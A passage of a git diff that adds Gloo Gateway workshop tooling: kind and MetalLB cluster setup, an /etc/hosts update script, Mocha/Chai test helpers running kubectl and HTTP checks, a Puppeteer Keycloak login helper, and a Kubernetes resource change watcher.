'{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 
+done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null || true" +sed -n '/```bash/,/```/p; //p' | egrep -v '```|' | sed '/#IGNORE_ME/d' diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/register-domain.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/register-domain.sh new file mode 100755 index 0000000000..1cb84cd86a --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/register-domain.sh @@ -0,0 +1,54 @@ +#!/usr/bin/env bash + +# Check if the correct number of arguments is provided +if [ "$#" -ne 2 ]; then + echo "Usage: $0 <hostname> <new_ip_or_domain>" + exit 1 +fi + +# Variables +hostname="$1" +new_ip_or_domain="$2" +hosts_file="/etc/hosts" + +# Function to check if the input is a valid IP address +is_ip() { + if [[ $1 =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then + return 0 # 0 = true - valid IPv4 address + elif [[ $1 =~ ^[0-9a-f]+[:]+[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9]*$ ]]; then + return 0 # 0 = true - valid IPv6 address + else + return 1 # 1 = false + fi +} + +# Function to resolve domain to the first IPv4 address using dig +resolve_domain() { + # Using dig to query A records, and awk to parse the first IPv4 address + dig +short A "$1" | awk '/^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {print; exit}' +} + +# Validate new_ip_or_domain or resolve domain to IP +if is_ip "$new_ip_or_domain"; then + new_ip="$new_ip_or_domain" +else + new_ip=$(resolve_domain "$new_ip_or_domain") + if [ -z "$new_ip" ]; then + echo "Failed to resolve domain to an IPv4 address."
+ exit 1 + fi +fi + +# Check if the entry already exists +if grep -q "$hostname\$" "$hosts_file"; then + # Update the existing entry with the new IP + tempfile=$(mktemp) + sed "s/^.*$hostname\$/$new_ip $hostname/" "$hosts_file" > "$tempfile" + sudo cp "$tempfile" "$hosts_file" + rm "$tempfile" + echo "Updated $hostname in $hosts_file with new IP: $new_ip" +else + # Add a new entry if it doesn't exist + echo "$new_ip $hostname" | sudo tee -a "$hosts_file" > /dev/null + echo "Added $hostname to $hosts_file with IP: $new_ip" +fi diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/timestamped_output.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/timestamped_output.sh new file mode 100755 index 0000000000..b1f741613e --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/timestamped_output.sh @@ -0,0 +1,6 @@ +#!/bin/bash + +# Read input line by line and prepend a timestamp +while IFS= read -r line; do + echo "$(date '+%Y-%m-%d %H:%M:%S') $line" +done diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/can-resolve.test.js.liquid b/gloo-gateway/1-18/enterprise-vm/default/tests/can-resolve.test.js.liquid new file mode 100644 index 0000000000..7d1163da97 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/can-resolve.test.js.liquid @@ -0,0 +1,17 @@ +const dns = require('dns'); +const chaiHttp = require("chai-http"); +const chai = require("chai"); +const expect = chai.expect; +chai.use(chaiHttp); +const { waitOnFailedTest } = require('./tests/utils'); + +afterEach(function(done) { waitOnFailedTest(done, this.currentTest.currentRetry())}); + +describe("Address '" + process.env.{{ to_resolve }} + "' can be resolved in DNS", () => { + it(process.env.{{ to_resolve }} + ' can be resolved', (done) => { + return dns.lookup(process.env.{{ to_resolve }}, (err, address, family) => { + expect(address).to.be.an.ip; + done(); + }); + }); +}); \ No newline at end of file diff --git 
a/gloo-gateway/1-18/enterprise-vm/default/tests/chai-exec.js b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-exec.js new file mode 100644 index 0000000000..67ba62f095 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-exec.js @@ -0,0 +1,205 @@ +const jsYaml = require('js-yaml'); +const deepObjectDiff = require('deep-object-diff'); +const chaiExec = require("@jsdevtools/chai-exec"); +const chai = require("chai"); +const expect = chai.expect; +const should = chai.should(); +chai.use(chaiExec); +const utils = require('./utils'); +const { debugLog } = require('./utils/logging'); +chai.config.truncateThreshold = 4000; // length threshold for actual and expected values in assertion errors + +global = { + checkKubernetesObject: async ({ context, namespace, kind, k8sObj, yaml }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get " + kind + " " + k8sObj + " -o json"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + let json = jsYaml.load(yaml) + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.should.exit.with.code(0); + cli.stderr.should.be.empty; + let data = JSON.parse(cli.stdout); + debugLog(`Parsed data from CLI: ${JSON.stringify(data)}`); + + let diff = deepObjectDiff.detailedDiff(json, data); + debugLog(`Diff between expected and actual object: ${JSON.stringify(diff)}`); + + let expectedObject = false; + if (Object.keys(diff.updated).length === 0 && Object.keys(diff.deleted).length === 0) { + expectedObject = true; + } + debugLog(`Expected object found: ${expectedObject}`); + expect(expectedObject, "The following object can't be found or is not as expected:\n" + yaml).to.be.true; + }, + + checkDeployment: async ({ context, namespace, k8sObj }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get deploy " + k8sObj + " -o jsonpath='{.status}'"; + debugLog(`Executing command: ${command}`); + let 
cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let readyReplicas = JSON.parse(cli.stdout.slice(1, -1)).readyReplicas || 0; + let replicas = JSON.parse(cli.stdout.slice(1, -1)).replicas; + debugLog(`Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { + debugLog(`Deployment ${k8sObj} in ${context} not ready, retrying...`); + await utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }, + + checkDeploymentHasPod: async ({ context, namespace, deployment }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get deploy " + deployment + " -o name"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + cli.stdout.should.not.be.empty; + cli.stdout.should.contain(deployment); + }, + + checkDeploymentsWithLabels: async ({ context, namespace, labels, instances }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get deploy -l " + labels + " -o jsonpath='{.items}'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let deployments = JSON.parse(cli.stdout.slice(1, -1)); + debugLog(`Found deployments: ${JSON.stringify(deployments)}`); + + expect(deployments).to.have.lengthOf(instances); + deployments.forEach((deployment) => { + let readyReplicas = deployment.status.readyReplicas || 0; + let replicas = deployment.status.replicas; + debugLog(`Deployment ${deployment.metadata.name} - Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { +
debugLog(`Deployment ${deployment.metadata.name} in ${context} not ready, retrying...`); + utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }); + }, + + checkStatefulSet: async ({ context, namespace, k8sObj }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get sts " + k8sObj + " -o jsonpath='{.status}'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let readyReplicas = JSON.parse(cli.stdout.slice(1, -1)).readyReplicas || 0; + let replicas = JSON.parse(cli.stdout.slice(1, -1)).replicas; + debugLog(`StatefulSet ${k8sObj} - Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { + debugLog(`StatefulSet ${k8sObj} in ${context} not ready, retrying...`); + await utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }, + + checkDaemonSet: async ({ context, namespace, k8sObj }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get ds " + k8sObj + " -o jsonpath='{.status}'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let readyReplicas = JSON.parse(cli.stdout.slice(1, -1)).numberReady || 0; + let replicas = JSON.parse(cli.stdout.slice(1, -1)).desiredNumberScheduled; + debugLog(`DaemonSet ${k8sObj} - Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { + debugLog(`DaemonSet ${k8sObj} in ${context} not ready, retrying...`); + await utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }, + + k8sObjectIsPresent: ({ context, namespace, k8sType, k8sObj }) 
=> { + let command = "kubectl --context " + context + " -n " + namespace + " get " + k8sType + " " + k8sObj + " -o name"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + cli.should.exit.with.code(0); + }, + + genericCommand: async ({ command, responseContains = "" }) => { + debugLog(`Executing generic command: ${command}`); + let cli = chaiExec(command); + + if (cli.stderr && cli.stderr != "") { + debugLog(`Command ${command} not successful: ${cli.stderr}`); + await utils.sleep(1000); + } + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + cli.should.exit.with.code(0); + if (responseContains != "") { + debugLog(`Checking if stdout contains: ${responseContains}`); + cli.stdout.should.contain(responseContains); + } + }, + + getOutputForCommand: ({ command }) => { + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + debugLog(`Command output (stdout): ${cli.stdout}`); + return cli.stdout; + }, + + curlInPod: ({ curlCommand, podName, namespace }) => { + debugLog(`Executing curl command: ${curlCommand} on pod: ${podName} in namespace: ${namespace}`); + const cli = chaiExec(curlCommand); + debugLog(`Curl command output (stdout): ${cli.stdout}`); + return cli.stdout; + }, + curlInDeployment: async ({ curlCommand, deploymentName, namespace, context }) => { + debugLog(`Executing curl command: ${curlCommand} on deployment: ${deploymentName} in namespace: ${namespace} and context: ${context}`); + let getPodCommand = `kubectl --context ${context} -n ${namespace} get pods -l app=${deploymentName} -o jsonpath='{.items[0].metadata.name}'`; + let podName = chaiExec(getPodCommand).stdout.trim(); + debugLog(`Pod selected for curl command: ${podName}`); + let execCommand = `kubectl --context ${context} 
-n ${namespace} exec ${podName} -- ${curlCommand}`; + const cli = chaiExec(execCommand); + debugLog(`Curl command output (stdout): ${cli.stdout}`); + return cli.stdout; + }, +}; + +module.exports = global; + +afterEach(function (done) { + if (this.currentTest.currentRetry() > 0 && this.currentTest.currentRetry() % 5 === 0) { + debugLog(`Test "${this.currentTest.fullTitle()}" retry: ${this.currentTest.currentRetry()}`); + } + utils.waitOnFailedTest(done, this.currentTest.currentRetry()) +}); diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/chai-http.js b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-http.js new file mode 100644 index 0000000000..67f43db003 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-http.js @@ -0,0 +1,139 @@ +const chaiHttp = require("chai-http"); +const chai = require("chai"); +const expect = chai.expect; +chai.use(chaiHttp); +const utils = require('./utils'); +const fs = require("fs"); +const { debugLog } = require('./utils/logging'); + +process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0'; +process.env.NODE_NO_WARNINGS = 1; +chai.config.truncateThreshold = 4000; // length threshold for actual and expected values in assertion errors + +global = { + checkURL: ({ host, path = "", headers = [], certFile = '', keyFile = '', retCode }) => { + debugLog(`Checking URL: ${host}${path} with expected return code: ${retCode}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? 
fs.readFileSync(keyFile) : ''; + let request = chai.request(host).head(path).redirects(0).cert(cert).key(key); + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + return request + .send() + .then(async function (res) { + debugLog(`Response status code: ${res.status}`); + expect(res).to.have.status(retCode); + }); + }, + + checkBody: ({ host, path = "", headers = [], body = '', certFile = '', keyFile = '', method = "get", data = "", match = true }) => { + debugLog(`Checking body at ${host}${path} with method: ${method} and match condition: ${match}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? fs.readFileSync(keyFile) : ''; + let request = chai.request(host); + + switch (method) { + case "get": + request = request.get(path).redirects(0).cert(cert).key(key); + break; + case "post": + request = request.post(path).redirects(0); + break; + case "put": + request = request.put(path).redirects(0); + break; + case "head": + request = request.head(path).redirects(0); + break; + default: + throw 'The requested method is not implemented.'; + } + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + debugLog(`Sending data: ${data}`); + return request + .send(data) + .then(async function (res) { + debugLog(`Response body: ${res.text}`); + if (match) { + expect(res.text).to.contain(body); + } else { + expect(res.text).not.to.contain(body); + } + }); + }, + + checkHeaders: ({ host, path = "", headers = [], certFile = '', keyFile = '', expectedHeaders = [] }) => { + debugLog(`Checking headers for URL: ${host}${path}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? 
fs.readFileSync(keyFile) : ''; + let request = chai.request(host).get(path).redirects(0).cert(cert).key(key); + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + return request + .send() + .then(async function (res) { + debugLog(`Response headers: ${JSON.stringify(res.header)}`); + expectedHeaders.forEach(header => { + debugLog(`Checking header ${header.key} with expected value: ${header.value}`); + if (header.value === '*') { + expect(res.header).to.have.property(header.key); + } else { + expect(res.header[header.key]).to.equal(header.value); + } + }); + }); + }, + + checkWithMethod: ({ host, path, headers = [], method = "get", certFile = '', keyFile = '', retCode }) => { + debugLog(`Checking URL: ${host}${path} with method: ${method} and expected return code: ${retCode}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? fs.readFileSync(keyFile) : ''; + let request = chai.request(host); + + switch (method) { + case 'get': + request = request.get(path); + break; + case 'post': + request = request.post(path); + break; + case 'put': + request = request.put(path); + break; + default: + throw 'The requested method is not implemented.'; + } + + request.cert(cert).key(key).redirects(0); + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + return request + .send() + .then(async function (res) { + debugLog(`Response status code: ${res.status}`); + expect(res).to.have.status(retCode); + }); + } +}; + +module.exports = global; + +afterEach(function (done) { + if (this.currentTest.currentRetry() > 0 && this.currentTest.currentRetry() % 5 === 0) { + console.log(`Test "${this.currentTest.fullTitle()}" retry: ${this.currentTest.currentRetry()}`); + } + utils.waitOnFailedTest(done, this.currentTest.currentRetry()); +}); diff --git 
a/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.js b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.js new file mode 100644 index 0000000000..07b7202922 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.js @@ -0,0 +1,248 @@ +// k8s-cr-watcher.js + +const k8s = require('@kubernetes/client-node'); +const yaml = require('js-yaml'); +const diff = require('deep-diff').diff; + +function delay(ms) { + return new Promise(resolve => setTimeout(resolve, ms)); +} + +function sanitizeObject(obj) { + const sanitized = JSON.parse(JSON.stringify(obj)); + if (sanitized.metadata) { + delete sanitized.metadata.managedFields; + delete sanitized.metadata.generation; + delete sanitized.metadata.resourceVersion; + delete sanitized.metadata.creationTimestamp; + } + return sanitized; +} + +function getValueAtPath(obj, pathArray) { + return pathArray.reduce((acc, key) => (acc && acc[key] !== undefined) ? acc[key] : undefined, obj); +} + +// Helper function to format differences into a human-readable string +function formatDifferences(differences, previousObj, currentObj) { + let output = ''; + const handledArrayPaths = new Set(); + + differences.forEach(d => { + const path = d.path.join('.'); + if (d.kind === 'A') { + const arrayPath = d.path.join('.'); + if (!handledArrayPaths.has(arrayPath)) { + const beforeArray = getValueAtPath(previousObj, d.path); + const afterArray = getValueAtPath(currentObj, d.path); + + output += `• ${arrayPath}:\n\nBefore:\n${yaml.dump(beforeArray).trim().split('\n').join('\n')}\nAfter:\n${yaml.dump(afterArray).trim().split('\n').join('\n')}\n`; + handledArrayPaths.add(arrayPath); + } + } else { + // Check if this change is part of an already handled array + const isPartOfHandledArray = Array.from(handledArrayPaths).some(arrayPath => path.startsWith(arrayPath)); + + if (!isPartOfHandledArray) { + switch (d.kind) { + case 'E': // Edit + output += `• ${path}: '${JSON.stringify(d.lhs)}' => 
'${JSON.stringify(d.rhs)}'\n`; + break; + case 'N': // New + output += `• ${path}: Added '${JSON.stringify(d.rhs)}'\n`; + break; + case 'D': // Deleted + output += `• ${path}: Removed '${JSON.stringify(d.lhs)}'\n`; + break; + default: + output += `• ${path}: Changed\n`; + } + } + } + }); + + return output; +} + +// Function to extract change information from an event +function extractChangeInfo(type, apiObj, previousObj, currentObj) { + const name = apiObj.metadata.name; + const namespace = apiObj.metadata.namespace; + const kind = apiObj.kind; + const apiVersion = apiObj.apiVersion; + + let changeInfo = `${type}: ${kind} "${name}"`; + if (namespace) { + changeInfo += ` in namespace "${namespace}"`; + } + changeInfo += ` (apiVersion: ${apiVersion})`; + + if (type === 'MODIFIED' && previousObj) { + const differences = diff(previousObj, apiObj); + if (differences && differences.length > 0) { + // Filter out non-essential diffs + const essentialDifferences = differences.filter(d => { + const path = d.path.join('.'); + return !path.startsWith('metadata.generation') && + !path.startsWith('metadata.resourceVersion') && + !path.startsWith('metadata.creationTimestamp'); + }); + + if (essentialDifferences.length > 0) { + changeInfo += '\n\nDifferences:\n' + formatDifferences(essentialDifferences, previousObj, apiObj); + } else { + changeInfo += '\n\nNo meaningful differences detected'; + } + } else { + changeInfo += '\n\nNo differences detected'; + } + } + + return changeInfo; +} + +async function watchCRs(contextName, delaySeconds, durationSeconds) { + let changeCount = 0; + let isWatchSetupComplete = false; + + console.log(`Waiting for ${delaySeconds} seconds before starting the test...`); + await delay(delaySeconds * 1000); + console.log('Delay complete. 
Starting the test.'); + + const kc = new k8s.KubeConfig(); + kc.loadFromDefault(); + + const contexts = kc.getContexts(); + const context = contexts.find(c => c.name === contextName); + + kc.setCurrentContext(contextName); + + const k8sApi = kc.makeApiClient(k8s.CustomObjectsApi); + const apisApi = kc.makeApiClient(k8s.ApisApi); + + async function getResources(group, version) { + try { + const { body } = await k8sApi.listClusterCustomObject(group, version, ''); + return body.resources || []; + } catch (error) { + console.error(`Error getting resources for ${group}/${version}: ${error}`); + return []; + } + } + + // Function to watch a specific CR + async function watchCR(group, version, plural, abortController) { + const watch = new k8s.Watch(kc); + let resourceVersion; + + try { + // Get the latest resourceVersion + const listResponse = await k8sApi.listClusterCustomObject(group, version, plural); + resourceVersion = listResponse.body.metadata.resourceVersion; + + // Cache of previous objects (sanitized) + const objectCache = {}; + + // Initialize the object cache + if (listResponse.body.items) { + listResponse.body.items.forEach(item => { + objectCache[item.metadata.uid] = sanitizeObject(item); + }); + } + + await watch.watch( + `/apis/${group}/${version}/${plural}`, + { + abortSignal: abortController.signal, + allowWatchBookmarks: true, + resourceVersion: resourceVersion + }, + (type, apiObj) => { + if (isWatchSetupComplete) { + const uid = apiObj.metadata.uid; + + // Sanitize the current object by removing non-essential metadata + const sanitizedObj = sanitizeObject(apiObj); + + let previousObj = objectCache[uid]; + + if (previousObj) { + // Clone previousObj to avoid mutation + previousObj = JSON.parse(JSON.stringify(previousObj)); + } + + if (type === 'ADDED' || type === 'MODIFIED' || type === 'DELETED') { + const changeInfo = extractChangeInfo(type, sanitizedObj, previousObj, sanitizedObj); + + // Only log meaningful changes + if (type === 'MODIFIED' && 
changeInfo.includes('No meaningful differences detected')) { + // Skip logging if there are no meaningful changes + return; + } + + console.log(changeInfo); + console.log('---'); + console.log(yaml.dump(sanitizedObj).trim()); // Display the full object in YAML + console.log('---'); + + if (type === 'DELETED') { + delete objectCache[uid]; + } else { + objectCache[uid] = sanitizedObj; + } + + changeCount++; + } + } + }, + (err) => { + if (err && err.message !== 'aborted') { + console.error(`Error watching ${group}/${version}/${plural}: ${err}`); + } + } + ); + } catch (error) { + if (error.message !== 'aborted') { + console.error(`Error setting up watch for ${group}/${version}/${plural}: ${error}`); + } + } + } + + console.log(`Using context: ${contextName}`); + console.log(`Watching for CR changes with apiVersion containing "istio", "gloo", "solo" or "gateway.networking.k8s.io" for ${durationSeconds} seconds...`); + + const abortController = new AbortController(); + const watchPromises = []; + + const { body: apiGroups } = await apisApi.getAPIVersions(); + + for (const group of apiGroups.groups) { + if (group.name.includes('istio') || group.name.includes('gloo') || group.name.includes('solo') || group.name.includes('gateway.networking.k8s.io')) { + const latestVersion = group.preferredVersion || group.versions[0]; + const resources = await getResources(group.name, latestVersion.version); + + for (const resource of resources) { + if (resource.kind && resource.name && !resource.name.includes('/')) { + watchPromises.push(watchCR(group.name, latestVersion.version, resource.name, abortController)); + } + } + } + } + + console.log("Watch setup complete. 
Listening for changes..."); + console.log('---'); + + isWatchSetupComplete = true; + + await new Promise(resolve => setTimeout(resolve, durationSeconds * 1000)); + + abortController.abort(); + console.log(`Watch completed after ${durationSeconds} seconds.`); + console.log(`Total changes detected: ${changeCount}`); + + await Promise.allSettled(watchPromises); + + return changeCount; +} + +module.exports = { watchCRs }; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.test.js.liquid b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.test.js.liquid new file mode 100644 index 0000000000..85ff59def2 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.test.js.liquid @@ -0,0 +1,25 @@ +const assert = require('assert'); +const { watchCRs } = require('./tests/k8s-changes'); + +describe('Kubernetes CR Watcher', function() { + let contextName = process.env.{{ context | default: "CLUSTER1" }}; + let delaySeconds = {{ delay | default: 5 }}; + let durationSeconds = {{ duration | default: 10 }}; + let changeCount = 0; + + it(`No CR changed in context ${contextName} for ${durationSeconds} seconds`, async function() { + this.timeout((durationSeconds + delaySeconds + 10) * 1000); + + changeCount = await watchCRs(contextName, delaySeconds, durationSeconds); + + assert.strictEqual(changeCount, 0, `Test failed: ${changeCount} changes were detected`); + }); + + after(function(done) { + setTimeout(() => { + process.exit(changeCount); + }, 1000); + + done(); + }); +}); \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak-token.js b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak-token.js new file mode 100644 index 0000000000..3ac1a691db --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak-token.js @@ -0,0 +1,4 @@ +const keycloak = require('./keycloak'); +const { argv } = require('node:process'); + +keycloak.getKeyCloakCookie(argv[2], 
argv[3]); diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak.js b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak.js new file mode 100644 index 0000000000..3af51e31c1 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak.js @@ -0,0 +1,48 @@ +const puppeteer = require('puppeteer'); +//const utils = require('./utils'); + +global = { + getKeyCloakCookie: async (url, user) => { + const browser = await puppeteer.launch({ + headless: "new", + slowMo: 40, + ignoreHTTPSErrors: true, + args: ['--no-sandbox', '--disable-setuid-sandbox'], // needed for instruqt + }); + // Create a new browser context + const context = await browser.createBrowserContext(); + const page = await context.newPage(); + await page.goto(url); + await page.waitForNetworkIdle({ timeout: 1000 }); + //await utils.sleep(1000); + + // Enter credentials + await page.screenshot({path: 'screenshot.png'}); + await page.waitForSelector('#username', { timeout: 1000 }); + await page.waitForSelector('#password', { timeout: 1000 }); + await page.type('#username', user); + await page.type('#password', 'password'); + await page.click('#kc-login'); + await page.waitForNetworkIdle({ timeout: 1000 }); + //await utils.sleep(1000); + + // Retrieve session cookie + const cookies = await page.cookies(); + const sessionCookie = cookies.find(cookie => cookie.name === 'keycloak-session'); + let ret; + if (sessionCookie) { + ret = `${sessionCookie.name}=${sessionCookie.value}`; // Construct the cookie string + } else { + // console.error(await page.content()); // very verbose + await page.screenshot({path: 'screenshot.png'}); + console.error(` No session cookie found for ${user}`); + ret = "keycloak-session=dummy"; + } + await context.close(); + await browser.close(); + console.log(ret); + return ret; + } +}; + +module.exports = global; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/base.js 
b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/base.js new file mode 100644 index 0000000000..af140b84f5 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/base.js @@ -0,0 +1,28 @@ +const { debugLog } = require('../utils/logging'); + +class BasePage { + constructor(page) { + this.page = page; + } + + async navigateTo(url) { + debugLog(`Navigating to ${url}`); + await this.page.goto(url, { waitUntil: 'networkidle2' }); + debugLog('Navigation complete'); + } + + async findVisibleSelector(selectors) { + for (const selector of selectors) { + const element = await this.page.$(selector); + if (element) { + const visible = await this.page.evaluate(el => !!(el.offsetWidth || el.offsetHeight || el.getClientRects().length), element); + if (visible) { + return selector; + } + } + } + throw new Error('No visible selector found for the provided options.'); + } +} + +module.exports = BasePage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/constants.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/constants.js new file mode 100644 index 0000000000..17068fbf55 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/constants.js @@ -0,0 +1,13 @@ +const InsightType = { + BP: 'BP', + CFG: 'CFG', + HLT: 'HLT', + ING: 'ING', + RES: 'RES', + RTE: 'RTE', + SEC: 'SEC', +}; + +module.exports = { + InsightType, +}; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-apps-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-apps-page.js new file mode 100644 index 0000000000..35e4ea7de5 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-apps-page.js @@ -0,0 +1,36 @@ +const BasePage = require("../base"); + +class DeveloperPortalAdminAppsPage extends BasePage { + constructor(page) { + super(page); + // Metadata selectors + this.editMetadataButton = 'button ::-p-text("Edit Custom Metadata")'; + 
this.metadataKeyInput = '#meta-key-input'; + this.metadataValueInput = '#meta-value-input'; + this.addMetadataButton = 'button[type="submit"] ::-p-text("Add Metadata")'; + this.saveMetadataButton = 'button[type="button"] ::-p-text("Save")'; + } + + async addCustomMetadata(key, value) { + // Click the edit metadata button + await this.page.waitForSelector(this.editMetadataButton, { visible: true }); + await this.page.locator(this.editMetadataButton).click(); + + // Fill in key and value + await this.page.waitForSelector(this.metadataKeyInput, { visible: true }); + await this.page.type(this.metadataKeyInput, key); + + await this.page.waitForSelector(this.metadataValueInput, { visible: true }); + await this.page.type(this.metadataValueInput, value); + + // Click add metadata button + await this.page.waitForSelector(this.addMetadataButton, { visible: true }); + await this.page.locator(this.addMetadataButton).click(); + + // Click save button + await this.page.waitForSelector(this.saveMetadataButton, { visible: true }); + await this.page.click(this.saveMetadataButton); + } +} + +module.exports = DeveloperPortalAdminAppsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-subscriptions-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-subscriptions-page.js new file mode 100644 index 0000000000..0b53432f99 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-subscriptions-page.js @@ -0,0 +1,85 @@ +const BasePage = require("../base"); + +class DeveloperPortalAdminSubscriptionPage extends BasePage { + constructor(page) { + super(page); + + // Subscription management 